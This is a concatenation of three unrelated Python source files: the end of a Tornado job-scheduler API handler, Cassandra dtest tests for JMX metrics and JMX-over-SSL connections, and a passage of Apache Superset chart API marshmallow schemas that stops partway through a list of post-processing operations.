self.set_status(200)
self.finish(response)
@tornado.web.removeslash
def patch(self, job_id):
"""Pauses a job.
pause_job() is a non-blocking operation, but audit log is a blocking operation.
Handles an endpoint:
PATCH /api/v1/jobs/{job_id}
:param str job_id: Job id.
"""
# This is non-blocking function.
# It returns job_id immediately.
self.scheduler_manager.pause_job(job_id)
# Blocking operation.
job = self._get_job(job_id)
self.datastore.add_audit_log(job_id, job['name'], constants.AUDIT_LOG_PAUSED, self.username)
response = {
'job_id': job_id}
self.set_status(200)
self.write(response)
@tornado.web.removeslash
def options(self, job_id):
"""Resumes a job.
resume_job() is a non-blocking operation, but audit log is a blocking operation.
Handles an endpoint:
OPTIONS /api/v1/jobs/{job_id}
:param str job_id: Job id.
"""
# This is non-blocking function.
# It returns job_id immediately.
self.scheduler_manager.resume_job(job_id)
# Blocking operation.
job = self._get_job(job_id)
self.datastore.add_audit_log(job_id, job['name'], constants.AUDIT_LOG_RESUMED,
self.username)
response = {
'job_id': job_id}
self.set_status(200)
self.write(response)
def _validate_post_data(self):
"""Validates POST data for adding a job.
:return: a dictionary that serves as kwargs for Scheduler.add_job()
:rtype: dict
:raises: HTTPError(400: Bad arguments).
"""
all_required_fields = ['name', 'job_class_string']
for field in all_required_fields:
if field not in self.json_args:
raise tornado.web.HTTPError(400, reason='Require this parameter: %s' % field)
at_least_one_required_fields = ['month', 'day', 'hour', 'minute', 'day_of_week']
valid_cron_string = False
for field in at_least_one_required_fields:
if field in self.json_args:
valid_cron_string = True
break
if not valid_cron_string:
raise tornado.web.HTTPError(400, reason=('Require at least one of following parameters:'
' %s' % str(at_least_one_required_fields)))
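# A hedged illustration (not part of the original handler): a JSON body that
# would pass _validate_post_data(). Only the field names come from the checks
# above; the job class path and cron values are made-up examples.
#
# {
#     "name": "nightly_report",
#     "job_class_string": "myscheduler.jobs.report_job.ReportJob",
#     "pub_args": [],
#     "minute": "0",
#     "hour": "2"
# }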
|
the-stack_106_14844
|
import os
import time
import pytest
import parse
import re
import logging
import ccmlib.common
from ccmlib.node import ToolError
from dtest import Tester
from tools.jmxutils import (JolokiaAgent, enable_jmx_ssl, make_mbean,
remove_perf_disable_shared_mem)
from tools.misc import generate_ssl_stores
since = pytest.mark.since
logger = logging.getLogger(__name__)
class TestJMX(Tester):
@pytest.fixture(autouse=True)
def fixture_add_additional_log_patterns(self, fixture_dtest_setup):
fixture_dtest_setup.ignore_log_patterns = (
            r'Failed to properly handshake with peer.* Closing the channel',
)
def test_netstats(self):
"""
Check functioning of nodetool netstats, especially with restarts.
@jira_ticket CASSANDRA-8122, CASSANDRA-6577
"""
#
cluster = self.cluster
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
node1.stress(['write', 'n=500K', 'no-warmup', '-schema', 'replication(factor=3)'])
node1.flush()
node1.stop(gently=False)
with pytest.raises(ToolError, message="ConnectException: 'Connection refused( \(Connection refused\))?'."):
node1.nodetool('netstats')
# don't wait; we're testing for when nodetool is called on a node mid-startup
node1.start(wait_for_binary_proto=False)
# until the binary interface is available, try `nodetool netstats`
binary_interface = node1.network_interfaces['binary']
time_out_at = time.time() + 30
running = False
while (not running and time.time() <= time_out_at):
running = ccmlib.common.check_socket_listening(binary_interface, timeout=0.5)
try:
node1.nodetool('netstats')
except Exception as e:
assert 'java.lang.reflect.UndeclaredThrowableException' not in str(e), \
'Netstats failed with UndeclaredThrowableException (CASSANDRA-8122)'
if not isinstance(e, ToolError):
raise
else:
assert re.search("ConnectException: 'Connection refused( \(Connection refused\))?'.", repr(e))
assert running, 'node1 never started'
def test_table_metric_mbeans(self):
"""
Test some basic table metric mbeans with simple writes.
"""
cluster = self.cluster
cluster.populate(3)
node1, node2, node3 = cluster.nodelist()
remove_perf_disable_shared_mem(node1)
cluster.start(wait_for_binary_proto=True)
version = cluster.version()
node1.stress(['write', 'n=10K', 'no-warmup', '-schema', 'replication(factor=3)'])
typeName = "ColumnFamily" if version <= '2.2.X' else 'Table'
logger.debug('Version {} typeName {}'.format(version, typeName))
# TODO the keyspace and table name are capitalized in 2.0
memtable_size = make_mbean('metrics', type=typeName, keyspace='keyspace1', scope='standard1',
name='AllMemtablesHeapSize')
disk_size = make_mbean('metrics', type=typeName, keyspace='keyspace1', scope='standard1',
name='LiveDiskSpaceUsed')
sstable_count = make_mbean('metrics', type=typeName, keyspace='keyspace1', scope='standard1',
name='LiveSSTableCount')
with JolokiaAgent(node1) as jmx:
mem_size = jmx.read_attribute(memtable_size, "Value")
assert int(mem_size) > 10000
on_disk_size = jmx.read_attribute(disk_size, "Count")
assert int(on_disk_size) == 0
node1.flush()
on_disk_size = jmx.read_attribute(disk_size, "Count")
assert int(on_disk_size) > 10000
sstables = jmx.read_attribute(sstable_count, "Value")
assert int(sstables) >= 1
@since('3.0')
def test_mv_metric_mbeans_release(self):
"""
Test that the right mbeans are created and released when creating mvs
"""
cluster = self.cluster
cluster.populate(1)
node = cluster.nodelist()[0]
remove_perf_disable_shared_mem(node)
cluster.start(wait_for_binary_proto=True)
node.run_cqlsh(cmds="""
CREATE KEYSPACE mvtest WITH REPLICATION = { 'class' : 'SimpleStrategy', 'replication_factor': 1 };
CREATE TABLE mvtest.testtable (
foo int,
bar text,
baz text,
PRIMARY KEY (foo, bar)
);
CREATE MATERIALIZED VIEW mvtest.testmv AS
SELECT foo, bar, baz FROM mvtest.testtable WHERE
foo IS NOT NULL AND bar IS NOT NULL AND baz IS NOT NULL
PRIMARY KEY (foo, bar, baz);""")
table_memtable_size = make_mbean('metrics', type='Table', keyspace='mvtest', scope='testtable',
name='AllMemtablesHeapSize')
table_view_read_time = make_mbean('metrics', type='Table', keyspace='mvtest', scope='testtable',
name='ViewReadTime')
table_view_lock_time = make_mbean('metrics', type='Table', keyspace='mvtest', scope='testtable',
name='ViewLockAcquireTime')
mv_memtable_size = make_mbean('metrics', type='Table', keyspace='mvtest', scope='testmv',
name='AllMemtablesHeapSize')
mv_view_read_time = make_mbean('metrics', type='Table', keyspace='mvtest', scope='testmv',
name='ViewReadTime')
mv_view_lock_time = make_mbean('metrics', type='Table', keyspace='mvtest', scope='testmv',
name='ViewLockAcquireTime')
missing_metric_message = "Table metric %s should have been registered after creating table %s" \
"but wasn't!"
with JolokiaAgent(node) as jmx:
assert jmx.read_attribute(table_memtable_size, "Value") is not None, \
missing_metric_message.format("AllMemtablesHeapSize", "testtable")
assert jmx.read_attribute(table_view_read_time, "Count") is not None, \
missing_metric_message.format("ViewReadTime", "testtable")
assert jmx.read_attribute(table_view_lock_time, "Count") is not None, \
missing_metric_message.format("ViewLockAcquireTime", "testtable")
assert jmx.read_attribute(mv_memtable_size, "Value") is not None, \
missing_metric_message.format("AllMemtablesHeapSize", "testmv")
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=mv_view_read_time, attribute="Count", verbose=False)
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=mv_view_lock_time, attribute="Count", verbose=False)
node.run_cqlsh(cmds="DROP KEYSPACE mvtest;")
with JolokiaAgent(node) as jmx:
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=table_memtable_size, attribute="Value", verbose=False)
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=table_view_lock_time, attribute="Count", verbose=False)
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=table_view_read_time, attribute="Count", verbose=False)
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=mv_memtable_size, attribute="Value", verbose=False)
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=mv_view_lock_time, attribute="Count", verbose=False)
with pytest.raises(Exception, match=".*InstanceNotFoundException.*"):
jmx.read_attribute(mbean=mv_view_read_time, attribute="Count", verbose=False)
def test_compactionstats(self):
"""
@jira_ticket CASSANDRA-10504
@jira_ticket CASSANDRA-10427
Test that jmx MBean used by nodetool compactionstats
properly updates the progress of a compaction
"""
cluster = self.cluster
cluster.populate(1)
node = cluster.nodelist()[0]
remove_perf_disable_shared_mem(node)
cluster.start(wait_for_binary_proto=True)
# Run a quick stress command to create the keyspace and table
node.stress(['write', 'n=1', 'no-warmup'])
# Disable compaction on the table
node.nodetool('disableautocompaction keyspace1 standard1')
node.nodetool('setcompactionthroughput 1')
node.stress(['write', 'n=150K', 'no-warmup'])
node.flush()
# Run a major compaction. This will be the compaction whose
# progress we track.
node.nodetool_process('compact')
# We need to sleep here to give compaction time to start
# Why not do something smarter? Because if the bug regresses,
# we can't rely on jmx to tell us that compaction started.
time.sleep(5)
compaction_manager = make_mbean('db', type='CompactionManager')
with JolokiaAgent(node) as jmx:
progress_string = jmx.read_attribute(compaction_manager, 'CompactionSummary')[0]
# Pause in between reads
# to allow compaction to move forward
time.sleep(2)
updated_progress_string = jmx.read_attribute(compaction_manager, 'CompactionSummary')[0]
var = 'Compaction@{uuid}(keyspace1, standard1, {progress}/{total})bytes'
progress = int(parse.search(var, progress_string).named['progress'])
updated_progress = int(parse.search(var, updated_progress_string).named['progress'])
logger.debug(progress_string)
logger.debug(updated_progress_string)
# We want to make sure that the progress is increasing,
# and that values other than zero are displayed.
assert updated_progress > progress
assert progress >= 0
assert updated_progress > 0
# Block until the major compaction is complete
# Otherwise nodetool will throw an exception
# Give a timeout, in case compaction is broken
# and never ends.
start = time.time()
max_query_timeout = 600
logger.debug("Waiting for compaction to finish:")
while (len(jmx.read_attribute(compaction_manager, 'CompactionSummary')) > 0) and (
time.time() - start < max_query_timeout):
logger.debug(jmx.read_attribute(compaction_manager, 'CompactionSummary'))
time.sleep(2)
@since('2.2')
def test_phi(self):
"""
Check functioning of nodetool failuredetector.
@jira_ticket CASSANDRA-9526
"""
cluster = self.cluster
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
stdout = node1.nodetool("failuredetector").stdout
phivalues = stdout.splitlines()
endpoint1values = phivalues[1].split()
endpoint2values = phivalues[2].split()
endpoint1 = endpoint1values[0][1:-1]
endpoint2 = endpoint2values[0][1:-1]
assert '127.0.0.2' in [endpoint1, endpoint2]
assert '127.0.0.3' in [endpoint1, endpoint2]
endpoint1phi = float(endpoint1values[1])
endpoint2phi = float(endpoint2values[1])
max_phi = 2.0
assert endpoint1phi > 0.0
assert endpoint1phi < max_phi
assert endpoint2phi > 0.0
assert endpoint2phi < max_phi
@since('4.0')
def test_set_get_batchlog_replay_throttle(self):
"""
@jira_ticket CASSANDRA-13614
Test that batchlog replay throttle can be set and get through JMX
"""
cluster = self.cluster
cluster.populate(2)
node = cluster.nodelist()[0]
remove_perf_disable_shared_mem(node)
cluster.start()
# Set and get throttle with JMX, ensuring that the rate change is logged
with JolokiaAgent(node) as jmx:
mbean = make_mbean('db', 'StorageService')
jmx.write_attribute(mbean, 'BatchlogReplayThrottleInKB', 4096)
assert len(node.grep_log('Updating batchlog replay throttle to 4096 KB/s, 2048 KB/s per endpoint',
filename='debug.log')) > 0
assert 4096 == jmx.read_attribute(mbean, 'BatchlogReplayThrottleInKB')
@since('3.9')
class TestJMXSSL(Tester):
keystore_password = 'cassandra'
truststore_password = 'cassandra'
def truststore(self):
return os.path.join(self.fixture_dtest_setup.test_path, 'truststore.jks')
def keystore(self):
return os.path.join(self.fixture_dtest_setup.test_path, 'keystore.jks')
def test_jmx_connection(self):
"""
Check connecting with a JMX client (via nodetool) where SSL is enabled for JMX
@jira_ticket CASSANDRA-12109
"""
cluster = self._populateCluster(require_client_auth=False)
node = cluster.nodelist()[0]
cluster.start()
self.assert_insecure_connection_rejected(node)
node.nodetool("info --ssl -Djavax.net.ssl.trustStore={ts} -Djavax.net.ssl.trustStorePassword={ts_pwd}"
.format(ts=self.truststore(), ts_pwd=self.truststore_password))
def test_require_client_auth(self):
"""
Check connecting with a JMX client (via nodetool) where SSL is enabled and
client certificate auth is also configured
@jira_ticket CASSANDRA-12109
"""
cluster = self._populateCluster(require_client_auth=True)
node = cluster.nodelist()[0]
cluster.start()
self.assert_insecure_connection_rejected(node)
# specifying only the truststore containing the server cert should fail
with pytest.raises(ToolError, match=".*SSLHandshakeException.*"):
node.nodetool("info --ssl -Djavax.net.ssl.trustStore={ts} -Djavax.net.ssl.trustStorePassword={ts_pwd}"
.format(ts=self.truststore(), ts_pwd=self.truststore_password))
# when both truststore and a keystore containing the client key are supplied, connection should succeed
node.nodetool(
"info --ssl -Djavax.net.ssl.trustStore={ts} -Djavax.net.ssl.trustStorePassword={ts_pwd} -Djavax.net.ssl.keyStore={ks} -Djavax.net.ssl.keyStorePassword={ks_pwd}"
.format(ts=self.truststore(), ts_pwd=self.truststore_password, ks=self.keystore(),
ks_pwd=self.keystore_password))
def assert_insecure_connection_rejected(self, node):
"""
Attempts to connect to JMX (via nodetool) without any client side ssl parameters, expecting failure
"""
with pytest.raises(ToolError):
node.nodetool("info")
def _populateCluster(self, require_client_auth=False):
cluster = self.cluster
cluster.populate(1)
generate_ssl_stores(self.fixture_dtest_setup.test_path)
if require_client_auth:
ts = self.truststore()
ts_pwd = self.truststore_password
else:
ts = None
ts_pwd = None
enable_jmx_ssl(cluster.nodelist()[0],
require_client_auth=require_client_auth,
keystore=self.keystore(),
keystore_password=self.keystore_password,
truststore=ts,
truststore_password=ts_pwd)
return cluster
|
the-stack_106_14846
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
from typing import Any, Dict
from flask_babel import gettext as _
from marshmallow import EXCLUDE, fields, post_load, Schema, validate
from marshmallow.validate import Length, Range
from marshmallow_enum import EnumField
from superset import app
from superset.common.chart_data import ChartDataResultFormat, ChartDataResultType
from superset.common.query_context import QueryContext
from superset.db_engine_specs.base import builtin_time_grains
from superset.utils import schema as utils
from superset.utils.core import (
AnnotationType,
FilterOperator,
PostProcessingBoxplotWhiskerType,
PostProcessingContributionOrientation,
TimeRangeEndpoint,
)
config = app.config
#
# RISON/JSON schemas for query parameters
#
get_delete_ids_schema = {"type": "array", "items": {"type": "integer"}}
width_height_schema = {
"type": "array",
"items": {"type": "integer"},
}
thumbnail_query_schema = {
"type": "object",
"properties": {"force": {"type": "boolean"}},
}
screenshot_query_schema = {
"type": "object",
"properties": {
"force": {"type": "boolean"},
"window_size": width_height_schema,
"thumb_size": width_height_schema,
},
}
get_export_ids_schema = {"type": "array", "items": {"type": "integer"}}
get_fav_star_ids_schema = {"type": "array", "items": {"type": "integer"}}
#
# Column schema descriptions
#
slice_name_description = "The name of the chart."
description_description = "A description of the chart propose."
viz_type_description = "The type of chart visualization used."
owners_description = (
"Owner are users ids allowed to delete or change this chart. "
"If left empty you will be one of the owners of the chart."
)
params_description = (
"Parameters are generated dynamically when clicking the save "
"or overwrite button in the explore view. "
"This JSON object for power users who may want to alter specific parameters."
)
query_context_description = (
"The query context represents the queries that need to run "
"in order to generate the data the visualization, and in what "
"format the data should be returned."
)
query_context_generation_description = (
"The query context generation represents whether the query_context"
"is user generated or not so that it does not update user modfied"
"state."
)
cache_timeout_description = (
"Duration (in seconds) of the caching timeout "
"for this chart. Note this defaults to the datasource/table"
" timeout if undefined."
)
datasource_id_description = (
"The id of the dataset/datasource this new chart will use. "
"A complete datasource identification needs `datasouce_id` "
"and `datasource_type`."
)
datasource_uid_description = (
"The uid of the dataset/datasource this new chart will use. "
"A complete datasource identification needs `datasouce_uid` "
)
datasource_type_description = (
"The type of dataset/datasource identified on `datasource_id`."
)
datasource_name_description = "The datasource name."
dashboards_description = "A list of dashboards to include this new chart to."
changed_on_description = "The ISO date that the chart was last changed."
slice_url_description = "The URL of the chart."
form_data_description = (
"Form data from the Explore controls used to form the chart's data query."
)
description_markeddown_description = "Sanitized HTML version of the chart description."
owners_name_description = "Name of an owner of the chart."
#
# OpenAPI method specification overrides
#
openapi_spec_methods_override = {
"get": {"get": {"description": "Get a chart detail information."}},
"get_list": {
"get": {
"description": "Get a list of charts, use Rison or JSON query "
"parameters for filtering, sorting, pagination and "
" for selecting specific columns and metadata.",
}
},
"info": {
"get": {
"description": "Several metadata information about chart API endpoints.",
}
},
"related": {
"get": {
"description": "Get a list of all possible owners for a chart. "
"Use `owners` has the `column_name` parameter"
}
},
}
class ChartEntityResponseSchema(Schema):
"""
Schema for a chart object
"""
slice_id = fields.Integer()
slice_name = fields.String(description=slice_name_description)
cache_timeout = fields.Integer(description=cache_timeout_description)
changed_on = fields.String(description=changed_on_description)
modified = fields.String()
description = fields.String(description=description_description)
description_markeddown = fields.String(
description=description_markeddown_description
)
form_data = fields.Dict(description=form_data_description)
slice_url = fields.String(description=slice_url_description)
class ChartPostSchema(Schema):
"""
Schema to add a new chart.
"""
slice_name = fields.String(
description=slice_name_description, required=True, validate=Length(1, 250)
)
description = fields.String(description=description_description, allow_none=True)
viz_type = fields.String(
description=viz_type_description,
validate=Length(0, 250),
example=["bar", "line_multi", "area", "table"],
)
owners = fields.List(fields.Integer(description=owners_description))
params = fields.String(
description=params_description, allow_none=True, validate=utils.validate_json
)
query_context = fields.String(
description=query_context_description,
allow_none=True,
validate=utils.validate_json,
)
query_context_generation = fields.Boolean(
description=query_context_generation_description, allow_none=True
)
cache_timeout = fields.Integer(
description=cache_timeout_description, allow_none=True
)
datasource_id = fields.Integer(description=datasource_id_description, required=True)
datasource_type = fields.String(
description=datasource_type_description,
validate=validate.OneOf(choices=("druid", "table", "view")),
required=True,
)
datasource_name = fields.String(
description=datasource_name_description, allow_none=True
)
dashboards = fields.List(fields.Integer(description=dashboards_description))
class ChartPutSchema(Schema):
"""
Schema to update or patch a chart
"""
slice_name = fields.String(
description=slice_name_description, allow_none=True, validate=Length(0, 250)
)
description = fields.String(description=description_description, allow_none=True)
viz_type = fields.String(
description=viz_type_description,
allow_none=True,
validate=Length(0, 250),
example=["bar", "line_multi", "area", "table"],
)
owners = fields.List(fields.Integer(description=owners_description))
params = fields.String(description=params_description, allow_none=True)
query_context = fields.String(
description=query_context_description, allow_none=True
)
query_context_generation = fields.Boolean(
description=query_context_generation_description, allow_none=True
)
cache_timeout = fields.Integer(
description=cache_timeout_description, allow_none=True
)
datasource_id = fields.Integer(
description=datasource_id_description, allow_none=True
)
datasource_type = fields.String(
description=datasource_type_description,
validate=validate.OneOf(choices=("druid", "table", "view")),
allow_none=True,
)
dashboards = fields.List(fields.Integer(description=dashboards_description))
class ChartGetDatasourceObjectDataResponseSchema(Schema):
datasource_id = fields.Integer(description="The datasource identifier")
datasource_type = fields.Integer(description="The datasource type")
class ChartGetDatasourceObjectResponseSchema(Schema):
label = fields.String(description="The name of the datasource")
value = fields.Nested(ChartGetDatasourceObjectDataResponseSchema)
class ChartGetDatasourceResponseSchema(Schema):
count = fields.Integer(description="The total number of datasources")
result = fields.Nested(ChartGetDatasourceObjectResponseSchema)
class ChartCacheScreenshotResponseSchema(Schema):
cache_key = fields.String(description="The cache key")
chart_url = fields.String(description="The url to render the chart")
image_url = fields.String(description="The url to fetch the screenshot")
class ChartDataColumnSchema(Schema):
column_name = fields.String(
description="The name of the target column", example="mycol",
)
type = fields.String(description="Type of target column", example="BIGINT")
class ChartDataAdhocMetricSchema(Schema):
"""
Ad-hoc metrics are used to define metrics outside the datasource.
"""
expressionType = fields.String(
description="Simple or SQL metric",
required=True,
validate=validate.OneOf(choices=("SIMPLE", "SQL")),
example="SQL",
)
aggregate = fields.String(
description="Aggregation operator. Only required for simple expression types.",
validate=validate.OneOf(
choices=("AVG", "COUNT", "COUNT_DISTINCT", "MAX", "MIN", "SUM")
),
)
column = fields.Nested(ChartDataColumnSchema)
sqlExpression = fields.String(
description="The metric as defined by a SQL aggregate expression. "
"Only required for SQL expression type.",
example="SUM(weight * observations) / SUM(weight)",
)
label = fields.String(
description="Label for the metric. Is automatically generated unless "
"hasCustomLabel is true, in which case label must be defined.",
example="Weighted observations",
)
hasCustomLabel = fields.Boolean(
description="When false, the label will be automatically generated based on "
"the aggregate expression. When true, a custom label has to be "
"specified.",
example=True,
)
optionName = fields.String(
description="Unique identifier. Can be any string value, as long as all "
"metrics have a unique identifier. If undefined, a random name "
"will be generated.",
example="metric_aec60732-fac0-4b17-b736-93f1a5c93e30",
)
timeGrain = fields.String(
description="Optional time grain for temporal filters", example="PT1M",
)
isExtra = fields.Boolean(
description="Indicates if the filter has been added by a filter component as "
"opposed to being a part of the original query."
)
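# Illustrative payload (an addition for documentation purposes, not part of the
# original module): a SQL-type ad-hoc metric as it could appear in a chart data
# request validated against ChartDataAdhocMetricSchema. The values simply reuse
# the field examples declared above.
EXAMPLE_SQL_ADHOC_METRIC = {
    "expressionType": "SQL",
    "sqlExpression": "SUM(weight * observations) / SUM(weight)",
    "label": "Weighted observations",
    "hasCustomLabel": True,
    "optionName": "metric_aec60732-fac0-4b17-b736-93f1a5c93e30",
}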
class ChartDataAggregateConfigField(fields.Dict):
def __init__(self) -> None:
super().__init__(
description="The keys are the name of the aggregate column to be created, "
"and the values specify the details of how to apply the "
"aggregation. If an operator requires additional options, "
"these can be passed here to be unpacked in the operator call. The "
"following numpy operators are supported: average, argmin, argmax, cumsum, "
"cumprod, max, mean, median, nansum, nanmin, nanmax, nanmean, nanmedian, "
"min, percentile, prod, product, std, sum, var. Any options required by "
"the operator can be passed to the `options` object.\n"
"\n"
"In the example, a new column `first_quantile` is created based on values "
"in the column `my_col` using the `percentile` operator with "
"the `q=0.25` parameter.",
example={
"first_quantile": {
"operator": "percentile",
"column": "my_col",
"options": {"q": 0.25},
}
},
)
class ChartDataPostProcessingOperationOptionsSchema(Schema):
pass
class ChartDataAggregateOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Aggregate operation config.
"""
    groupby = fields.List(
        fields.String(
            allow_none=False, description="Columns by which to group",
        ),
        minLength=1,
        required=True,
    )
aggregates = ChartDataAggregateConfigField()
class ChartDataRollingOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Rolling operation config.
"""
    columns = fields.Dict(
        description="columns on which to perform rolling, mapping source column to "
                    "target column. For instance, `{'y': 'y'}` will replace the "
                    "column `y` with the rolling value in `y`, while `{'y': 'y2'}` "
                    "will add a column `y2` based on rolling values calculated "
                    "from `y`, leaving the original column `y` unchanged.",
        example={"weekly_rolling_sales": "sales"},
    )
rolling_type = fields.String(
description="Type of rolling window. Any numpy function will work.",
validate=validate.OneOf(
choices=(
"average",
"argmin",
"argmax",
"cumsum",
"cumprod",
"max",
"mean",
"median",
"nansum",
"nanmin",
"nanmax",
"nanmean",
"nanmedian",
"nanpercentile",
"min",
"percentile",
"prod",
"product",
"std",
"sum",
"var",
)
),
required=True,
example="percentile",
)
window = fields.Integer(
description="Size of the rolling window in days.", required=True, example=7,
)
rolling_type_options = fields.Dict(
desctiption="Optional options to pass to rolling method. Needed for "
"e.g. quantile operation.",
example={},
)
center = fields.Boolean(
description="Should the label be at the center of the window. Default: `false`",
example=False,
)
win_type = fields.String(
description="Type of window function. See "
"[SciPy window functions](https://docs.scipy.org/doc/scipy/reference"
"/signal.windows.html#module-scipy.signal.windows) "
"for more details. Some window functions require passing "
"additional parameters to `rolling_type_options`. For instance, "
"to use `gaussian`, the parameter `std` needs to be provided.",
validate=validate.OneOf(
choices=(
"boxcar",
"triang",
"blackman",
"hamming",
"bartlett",
"parzen",
"bohman",
"blackmanharris",
"nuttall",
"barthann",
"kaiser",
"gaussian",
"general_gaussian",
"slepian",
"exponential",
)
),
)
min_periods = fields.Integer(
description="The minimum amount of periods required for a row to be included "
"in the result set.",
example=7,
)
class ChartDataSelectOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
    Select operation config.
"""
columns = fields.List(
fields.String(),
description="Columns which to select from the input data, in the desired "
"order. If columns are renamed, the original column name should be "
"referenced here.",
example=["country", "gender", "age"],
)
exclude = fields.List(
fields.String(),
description="Columns to exclude from selection.",
example=["my_temp_column"],
)
rename = fields.List(
fields.Dict(),
description="columns which to rename, mapping source column to target column. "
"For instance, `{'y': 'y2'}` will rename the column `y` to `y2`.",
example=[{"age": "average_age"}],
)
class ChartDataSortOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Sort operation config.
"""
columns = fields.Dict(
description="columns by by which to sort. The key specifies the column name, "
"value specifies if sorting in ascending order.",
example={"country": True, "gender": False},
required=True,
)
aggregates = ChartDataAggregateConfigField()
class ChartDataContributionOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Contribution operation config.
"""
orientation = fields.String(
description="Should cell values be calculated across the row or column.",
required=True,
validate=validate.OneOf(
choices=[val.value for val in PostProcessingContributionOrientation]
),
example="row",
)
class ChartDataProphetOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Prophet operation config.
"""
time_grain = fields.String(
description="Time grain used to specify time period increments in prediction. "
"Supports [ISO 8601](https://en.wikipedia.org/wiki/ISO_8601#Durations) "
"durations.",
validate=validate.OneOf(
choices=[
i
for i in {**builtin_time_grains, **config["TIME_GRAIN_ADDONS"]}.keys()
if i
]
),
example="P1D",
required=True,
)
periods = fields.Integer(
descrption="Time periods (in units of `time_grain`) to predict into the future",
min=1,
example=7,
required=True,
)
confidence_interval = fields.Float(
description="Width of predicted confidence interval",
validate=[
Range(
min=0,
max=1,
min_inclusive=False,
max_inclusive=False,
error=_("`confidence_interval` must be between 0 and 1 (exclusive)"),
)
],
example=0.8,
required=True,
)
yearly_seasonality = fields.Raw(
# TODO: add correct union type once supported by Marshmallow
description="Should yearly seasonality be applied. "
"An integer value will specify Fourier order of seasonality, `None` will "
"automatically detect seasonality.",
example=False,
)
weekly_seasonality = fields.Raw(
# TODO: add correct union type once supported by Marshmallow
description="Should weekly seasonality be applied. "
"An integer value will specify Fourier order of seasonality, `None` will "
"automatically detect seasonality.",
example=False,
)
monthly_seasonality = fields.Raw(
# TODO: add correct union type once supported by Marshmallow
description="Should monthly seasonality be applied. "
"An integer value will specify Fourier order of seasonality, `None` will "
"automatically detect seasonality.",
example=False,
)
class ChartDataBoxplotOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Boxplot operation config.
"""
groupby = fields.List(
fields.String(description="Columns by which to group the query.",),
allow_none=True,
)
metrics = fields.List(
fields.Raw(),
description="Aggregate expressions. Metrics can be passed as both "
"references to datasource metrics (strings), or ad-hoc metrics"
"which are defined only within the query object. See "
"`ChartDataAdhocMetricSchema` for the structure of ad-hoc metrics.",
allow_none=True,
)
whisker_type = fields.String(
description="Whisker type. Any numpy function will work.",
validate=validate.OneOf(
choices=([val.value for val in PostProcessingBoxplotWhiskerType])
),
required=True,
example="tukey",
)
percentiles = fields.Tuple(
(
fields.Float(
description="Lower percentile",
validate=[
Range(
min=0,
max=100,
min_inclusive=False,
max_inclusive=False,
error=_(
"lower percentile must be greater than 0 and less "
"than 100. Must be lower than upper percentile."
),
),
],
),
fields.Float(
description="Upper percentile",
validate=[
Range(
min=0,
max=100,
min_inclusive=False,
max_inclusive=False,
error=_(
"upper percentile must be greater than 0 and less "
"than 100. Must be higher than lower percentile."
),
),
],
),
),
description="Upper and lower percentiles for percentile whisker type.",
example=[1, 99],
)
class ChartDataPivotOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Pivot operation config.
"""
    index = fields.List(
        fields.String(allow_none=False),
        description="Columns to group by on the table index (=rows)",
        minLength=1,
        required=True,
    )
columns = fields.List(
fields.String(allow_none=False),
description="Columns to group by on the table columns",
)
metric_fill_value = fields.Number(
description="Value to replace missing values with in aggregate calculations.",
)
column_fill_value = fields.String(
description="Value to replace missing pivot columns names with."
)
drop_missing_columns = fields.Boolean(
description="Do not include columns whose entries are all missing "
"(default: `true`).",
)
marginal_distributions = fields.Boolean(
description="Add totals for row/column. (default: `false`)",
)
marginal_distribution_name = fields.String(
description="Name of marginal distribution row/column. (default: `All`)",
)
aggregates = ChartDataAggregateConfigField()
class ChartDataGeohashDecodeOptionsSchema(
ChartDataPostProcessingOperationOptionsSchema
):
"""
Geohash decode operation config.
"""
geohash = fields.String(
description="Name of source column containing geohash string", required=True,
)
latitude = fields.String(
description="Name of target column for decoded latitude", required=True,
)
longitude = fields.String(
description="Name of target column for decoded longitude", required=True,
)
class ChartDataGeohashEncodeOptionsSchema(
ChartDataPostProcessingOperationOptionsSchema
):
"""
Geohash encode operation config.
"""
latitude = fields.String(
description="Name of source latitude column", required=True,
)
longitude = fields.String(
description="Name of source longitude column", required=True,
)
geohash = fields.String(
description="Name of target column for encoded geohash string", required=True,
)
class ChartDataGeodeticParseOptionsSchema(
ChartDataPostProcessingOperationOptionsSchema
):
"""
Geodetic point string parsing operation config.
"""
geodetic = fields.String(
description="Name of source column containing geodetic point strings",
required=True,
)
latitude = fields.String(
description="Name of target column for decoded latitude", required=True,
)
longitude = fields.String(
description="Name of target column for decoded longitude", required=True,
)
altitude = fields.String(
description="Name of target column for decoded altitude. If omitted, "
"altitude information in geodetic string is ignored.",
)
class ChartDataPostProcessingOperationSchema(Schema):
operation = fields.String(
description="Post processing operation type",
required=True,
validate=validate.OneOf(
choices=(
"aggregate",
"boxplot",
"contribution",
"cum",
"geodetic_parse",
"geohash_decode",
"geohash_encode",
"pivot",
"prophet",
"rolling",
"select",
"sort",
"diff",
